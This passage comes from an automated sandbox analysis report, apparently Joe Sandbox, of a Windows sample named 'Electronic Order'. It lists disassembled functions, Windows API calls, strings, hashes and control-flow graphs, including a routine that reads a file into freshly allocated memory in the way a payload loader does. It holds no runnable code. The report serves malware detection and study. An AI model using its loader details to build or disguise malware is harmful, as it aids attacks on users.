                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Dt$Dt$Dt$Dt$Variable must be of type 'Object'.
                                      • API String ID: 0-3952547859
                                      • Opcode ID: 67d25289e525f0ee4a5b8996c4b81067850ee62aba5b901c11c87a87366b7af2
                                      • Instruction ID: 8c27b04fa7f1f31f78ad1df62891673810b802918709dd6b04af8b3e8c6623e9
                                      • Opcode Fuzzy Hash: 67d25289e525f0ee4a5b8996c4b81067850ee62aba5b901c11c87a87366b7af2
                                      • Instruction Fuzzy Hash: C1A25CB5A04216CFCB24CF58C580FA9B7B2FF48314F28805DE956AB251D735ED86CB61
                                      Function 00E24696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,00DFE7C1), ref: 00E246A6
                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00E246B7
                                      • FindClose.KERNEL32(00000000), ref: 00E246C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
                                      • Opcode ID: 14878318f2ff5975c83649b62c9123c7ece9b7beee439522ee2755f27f3ffab2
                                      • Instruction ID: c6780ea8f2af4f05a52e4fcd35973e67f55b52cd2c9b80e57576b6c20d38bb20
                                      • Opcode Fuzzy Hash: 14878318f2ff5975c83649b62c9123c7ece9b7beee439522ee2755f27f3ffab2
                                      • Instruction Fuzzy Hash: 0BE0D8754104109F42106738FC4D8EA775C9F07739F100715F935E10F0E7B059548599
                                      Function 00DD0B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DD0BBB
                                      • timeGetTime.WINMM ref: 00DD0E76
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DD0FB3
                                      • TranslateMessage.USER32(?), ref: 00DD0FC7
                                      • DispatchMessageW.USER32(?), ref: 00DD0FD5
                                      • Sleep.KERNEL32(0000000A), ref: 00DD0FDF
                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00DD105A
                                      • DestroyWindow.USER32 ref: 00DD1066
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DD1080
                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00E052AD
                                      • TranslateMessage.USER32(?), ref: 00E0608A
                                      • DispatchMessageW.USER32(?), ref: 00E06098
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E060AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr$pr$pr$pr
                                      • API String ID: 4003667617-1825247661
                                      • Opcode ID: 529e246f035edab07dfadccf36ef3498d8779615433f532336d7cc2433d907d0
                                      • Instruction ID: af32d52e9cd4074d969b5482bbceaf1fedda42d64a40214ee2dde5b2d7982053
                                      • Opcode Fuzzy Hash: 529e246f035edab07dfadccf36ef3498d8779615433f532336d7cc2433d907d0
                                      • Instruction Fuzzy Hash: F5B29271608741DFD724DF24C884BAABBE5FF84304F14491EE499A72A1DB71E885CFA2
                                      Function 00E293DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00E291E9: __time64.LIBCMT ref: 00E291F3
                                        • Part of subcall function 00DC5045: _fseek.LIBCMT ref: 00DC505D
                                      • __wsplitpath.LIBCMT ref: 00E294BE
                                        • Part of subcall function 00DE432E: __wsplitpath_helper.LIBCMT ref: 00DE436E
                                      • _wcscpy.LIBCMT ref: 00E294D1
                                      • _wcscat.LIBCMT ref: 00E294E4
                                      • __wsplitpath.LIBCMT ref: 00E29509
                                      • _wcscat.LIBCMT ref: 00E2951F
                                      • _wcscat.LIBCMT ref: 00E29532
                                        • Part of subcall function 00E2922F: _memmove.LIBCMT ref: 00E29268
                                        • Part of subcall function 00E2922F: _memmove.LIBCMT ref: 00E29277
                                      • _wcscmp.LIBCMT ref: 00E29479
                                        • Part of subcall function 00E299BE: _wcscmp.LIBCMT ref: 00E29AAE
                                        • Part of subcall function 00E299BE: _wcscmp.LIBCMT ref: 00E29AC1
                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E296DC
                                      • _wcsncpy.LIBCMT ref: 00E2974F
                                      • DeleteFileW.KERNEL32(?,?), ref: 00E29785
                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E2979B
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E297AC
                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E297BE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                      • String ID:
                                      • API String ID: 1500180987-0
                                      • Opcode ID: cdab09c2208ee04cb17a4b8a96b85b340d6de05313a3714c413964cd875c93f7
                                      • Instruction ID: a809506919b33d94b80f6016d6f97d42d3baa2b16f5a0699199fd890ec549ecd
                                      • Opcode Fuzzy Hash: cdab09c2208ee04cb17a4b8a96b85b340d6de05313a3714c413964cd875c93f7
                                      • Instruction Fuzzy Hash: 37C128B1D00229AADF21DF95DC85EDEB7BDEF45300F0050AAE609E7152DB70AA848F65
                                      Function 00DC3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00DC3074
                                      • RegisterClassExW.USER32(00000030), ref: 00DC309E
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DC30AF
                                      • InitCommonControlsEx.COMCTL32(?), ref: 00DC30CC
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DC30DC
                                      • LoadIconW.USER32(000000A9), ref: 00DC30F2
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DC3101
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: 398a91169e5ca14a457bd054b6efa2361307d280f5ebe5c2d130fce243548d6f
                                      • Instruction ID: 68ba6880344f915ce7e4dfd4f769b8eb8d0cece7a24163cbc5f58ae67181c743
                                      • Opcode Fuzzy Hash: 398a91169e5ca14a457bd054b6efa2361307d280f5ebe5c2d130fce243548d6f
                                      • Instruction Fuzzy Hash: F33156B5840309EFDB00CFA5E889AD9BBF4FB0A710F10416AE544B62A0D3B90549CF51
                                      Function 00DC3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00DC3074
                                      • RegisterClassExW.USER32(00000030), ref: 00DC309E
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DC30AF
                                      • InitCommonControlsEx.COMCTL32(?), ref: 00DC30CC
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DC30DC
                                      • LoadIconW.USER32(000000A9), ref: 00DC30F2
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DC3101
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: e42b59eb80f0fc4bd4917bb69b59370fa1ab435fed9a19e8b9b0646f79e80601
                                      • Instruction ID: b5e48c5830c10c657d976c7a41f10a488d217f028cd682f4658a26d1a29b6a1e
                                      • Opcode Fuzzy Hash: e42b59eb80f0fc4bd4917bb69b59370fa1ab435fed9a19e8b9b0646f79e80601
                                      • Instruction Fuzzy Hash: FA21C5B5D50218AFDB00DFA6E849B9DBBF4FB09B00F00412AF518B62A0D7B545498F95
                                      Function 00DC71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00DC4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E862F8,?,00DC37C0,?), ref: 00DC4882
                                        • Part of subcall function 00DE074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00DC72C5), ref: 00DE0771
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00DC7308
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00DFECF1
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00DFED32
                                      • RegCloseKey.ADVAPI32(?), ref: 00DFED70
                                      • _wcscat.LIBCMT ref: 00DFEDC9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                      • API String ID: 2673923337-2727554177
                                      • Opcode ID: 0a3f143a295c607642521f26b17a67fe10526acb25f254e7e4acc673f6eaf619
                                      • Instruction ID: 92fc7a0bcc9e0838285bf3c950ce1a59845d90fa2873b193eca6831964031e9b
                                      • Opcode Fuzzy Hash: 0a3f143a295c607642521f26b17a67fe10526acb25f254e7e4acc673f6eaf619
                                      • Instruction Fuzzy Hash: 7A717CB14083069EC314EF66EC8196BBBE8FF95750B54492EF589A31B0DB30D948CB71
                                      Function 00DC3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 760 dc3633-dc3681 762 dc36e1-dc36e3 760->762 763 dc3683-dc3686 760->763 762->763 764 dc36e5 762->764 765 dc3688-dc368f 763->765 766 dc36e7 763->766 767 dc36ca-dc36d2 DefWindowProcW 764->767 770 dc375d-dc3765 PostQuitMessage 765->770 771 dc3695-dc369a 765->771 768 dc36ed-dc36f0 766->768 769 dfd31c-dfd34a call dd11d0 call dd11f3 766->769 778 dc36d8-dc36de 767->778 773 dc3715-dc373c SetTimer RegisterWindowMessageW 768->773 774 dc36f2-dc36f3 768->774 807 dfd34f-dfd356 769->807 772 dc3711-dc3713 770->772 775 dfd38f-dfd3a3 call e22a16 771->775 776 dc36a0-dc36a2 771->776 772->778 773->772 781 dc373e-dc3749 CreatePopupMenu 773->781 779 dfd2bf-dfd2c2 774->779 780 dc36f9-dc370c KillTimer call dc44cb call dc3114 774->780 775->772 801 dfd3a9 775->801 782 dc36a8-dc36ad 776->782 783 dc3767-dc3776 call dc4531 776->783 787 dfd2f8-dfd317 MoveWindow 779->787 788 dfd2c4-dfd2c6 779->788 780->772 781->772 790 dfd374-dfd37b 782->790 791 dc36b3-dc36b8 782->791 783->772 787->772 795 dfd2c8-dfd2cb 788->795 796 dfd2e7-dfd2f3 SetFocus 788->796 790->767 798 dfd381-dfd38a call e1817e 790->798 799 dc36be-dc36c4 791->799 800 dc374b-dc375b call dc45df 791->800 795->799 803 dfd2d1-dfd2e2 call dd11d0 795->803 796->772 798->767 799->767 799->807 800->772 801->767 803->772 807->767 808 dfd35c-dfd36f call dc44cb call dc43db 807->808 808->767
                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00DC36D2
                                      • KillTimer.USER32(?,00000001), ref: 00DC36FC
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DC371F
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DC372A
                                      • CreatePopupMenu.USER32 ref: 00DC373E
                                      • PostQuitMessage.USER32(00000000), ref: 00DC375F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated$%
                                      • API String ID: 129472671-3835587964
                                      • Opcode ID: 60f6ebf4a2f2585f8c19b41cff916d84c30f8700876925d65ef882a23ecce795
                                      • Instruction ID: 840ee1ca10c2b5564e976ca2b15bf5481b8fe8032cce1cd5b818b0f2f2280ade
                                      • Opcode Fuzzy Hash: 60f6ebf4a2f2585f8c19b41cff916d84c30f8700876925d65ef882a23ecce795
                                      • Instruction Fuzzy Hash: 044116B2254107BFDF146F68EC0AF793755EB41300F18812DF64AA72E1CA64DE1597B1
                                      Function 00DC3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00DC3A62
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00DC3A71
                                      • LoadIconW.USER32(00000063), ref: 00DC3A88
                                      • LoadIconW.USER32(000000A4), ref: 00DC3A9A
                                      • LoadIconW.USER32(000000A2), ref: 00DC3AAC
                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DC3AD2
                                      • RegisterClassExW.USER32(?), ref: 00DC3B28
                                        • Part of subcall function 00DC3041: GetSysColorBrush.USER32(0000000F), ref: 00DC3074
                                        • Part of subcall function 00DC3041: RegisterClassExW.USER32(00000030), ref: 00DC309E
                                        • Part of subcall function 00DC3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DC30AF
                                        • Part of subcall function 00DC3041: InitCommonControlsEx.COMCTL32(?), ref: 00DC30CC
                                        • Part of subcall function 00DC3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DC30DC
                                        • Part of subcall function 00DC3041: LoadIconW.USER32(000000A9), ref: 00DC30F2
                                        • Part of subcall function 00DC3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DC3101
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      • Opcode ID: f8b25ca4da5d195f162d97417f12e905be1b56d88b226927a8b9878624e79fab
                                      • Instruction ID: edfe9a4524f8031ad3f375fba8a086c2c4949b9303446dbb0833f9dd1f18d40f
                                      • Opcode Fuzzy Hash: f8b25ca4da5d195f162d97417f12e905be1b56d88b226927a8b9878624e79fab
                                      • Instruction Fuzzy Hash: 4F214B75950308AFEB109FA6EC09B9D7BB5FB08710F00416AF508BB2B0D3BA56589F94
                                      Function 00DC3778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b
                                      • API String ID: 1825951767-3834736419
                                      • Opcode ID: 613f64c75d2d9b0951f48c5180803bc800665f2d7d5c25a2cf752f29c73ba445
                                      • Instruction ID: def6e43e59b05d1f29397f46423d0d8cb58f4064f9a7872276a3afc1b99f6451
                                      • Opcode Fuzzy Hash: 613f64c75d2d9b0951f48c5180803bc800665f2d7d5c25a2cf752f29c73ba445
                                      • Instruction Fuzzy Hash: 06A14A7191022A9ACB05EBA1DC96EEEB7B9FF14300F14452DF416B7191DF74AA09CB70
                                      Function 00DCF8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00DE03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DE03D3
                                        • Part of subcall function 00DE03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DE03DB
                                        • Part of subcall function 00DE03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DE03E6
                                        • Part of subcall function 00DE03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DE03F1
                                        • Part of subcall function 00DE03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DE03F9
                                        • Part of subcall function 00DE03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE0401
                                        • Part of subcall function 00DD6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00DCFA90), ref: 00DD62B4
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DCFB2D
                                      • OleInitialize.OLE32(00000000), ref: 00DCFBAA
                                      • CloseHandle.KERNEL32(00000000), ref: 00E049F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                      • String ID: <g$\d$%$c
                                      • API String ID: 1986988660-619945097
                                      • Opcode ID: cd676ded48a0ee1862973d4d83b829e631adad6f78891d22675e056720430486
                                      • Instruction ID: f655133ecbd0f9a10ee078ac50f0019e207704e7766ec758fd7e2ae6f923aff4
                                      • Opcode Fuzzy Hash: cd676ded48a0ee1862973d4d83b829e631adad6f78891d22675e056720430486
                                      • Instruction Fuzzy Hash: 718187B09012508FC784EF7BA9556197BF5FB98708B10952AE42DFB272EB36440D8F61
                                      Function 01582610 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 983 1582610-15826be call 1580000 986 15826c5-15826eb call 1583520 CreateFileW 983->986 989 15826ed 986->989 990 15826f2-1582702 986->990 991 158283d-1582841 989->991 998 1582709-1582723 VirtualAlloc 990->998 999 1582704 990->999 992 1582883-1582886 991->992 993 1582843-1582847 991->993 995 1582889-1582890 992->995 996 1582849-158284c 993->996 997 1582853-1582857 993->997 1002 1582892-158289d 995->1002 1003 15828e5-15828fa 995->1003 996->997 1004 1582859-1582863 997->1004 1005 1582867-158286b 997->1005 1000 158272a-1582741 ReadFile 998->1000 1001 1582725 998->1001 999->991 1006 1582748-1582788 VirtualAlloc 1000->1006 1007 1582743 1000->1007 1001->991 1008 158289f 1002->1008 1009 15828a1-15828ad 1002->1009 1010 158290a-1582912 1003->1010 1011 15828fc-1582907 VirtualFree 1003->1011 1004->1005 1012 158287b 1005->1012 1013 158286d-1582877 1005->1013 1014 158278a 1006->1014 1015 158278f-15827aa call 1583770 1006->1015 1007->991 1008->1003 1016 15828af-15828bf 1009->1016 1017 15828c1-15828cd 1009->1017 1011->1010 1012->992 1013->1012 1014->991 1023 15827b5-15827bf 1015->1023 1019 15828e3 1016->1019 1020 15828da-15828e0 1017->1020 1021 15828cf-15828d8 1017->1021 1019->995 1020->1019 1021->1019 1024 15827c1-15827f0 call 1583770 1023->1024 1025 15827f2-1582806 call 1583580 1023->1025 1024->1023 1030 1582808 1025->1030 1031 158280a-158280e 1025->1031 1030->991 1033 158281a-158281e 1031->1033 1034 1582810-1582814 FindCloseChangeNotification 1031->1034 1035 158282e-1582837 1033->1035 1036 1582820-158282b VirtualFree 1033->1036 1034->1033 1035->986 1035->991 1036->1035
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015826E1
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01582907
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateFileFreeVirtual
                                      • String ID:
                                      • API String ID: 204039940-0
                                      • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                      • Instruction ID: 18095a84c19eb8f29cb7a23407b9a64dc356ebcbf243ff1007ccd3e35b3be850
                                      • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                      • Instruction Fuzzy Hash: F0A1F674E00209EBDF14EFA4C898BAEBBB5FF48304F208559E605BB280D7759A41CF95
                                      Function 00DC39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                      Download Yara Rule

